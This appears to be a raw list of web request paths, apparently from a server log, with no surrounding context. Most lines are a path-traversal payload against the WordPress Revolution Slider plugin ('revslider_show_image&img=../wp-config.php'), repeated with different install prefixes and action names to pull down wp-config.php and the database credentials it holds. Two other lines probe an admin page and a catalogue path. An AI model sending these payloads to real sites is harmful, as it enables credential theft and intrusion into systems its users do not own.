/sites/bib3.us.es/files/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
/sites/bib3.us.es/files/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
/busca_y_encuentra/cat%20
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
/sites/bib3.us.es/files/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
/sites/bib3.us.es/files/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
/admin.php
